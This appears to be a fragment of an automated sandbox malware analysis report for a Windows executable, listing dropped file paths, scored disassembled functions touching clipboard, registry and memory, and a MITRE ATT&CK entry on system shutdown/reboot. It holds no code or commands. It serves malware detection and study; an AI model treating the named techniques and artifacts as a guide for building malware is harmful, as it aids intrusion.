C:\Users\user\AppData\Roaming\brugser\brugo\grinagtigere.per

C:\Users\user\AppData\Roaming\brugser\brugo\sarcosomal.vas

Static File Info

Windows Analysis Report
KO0q4biYfC.exe

Function 004034A5 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405450 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 73C61777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre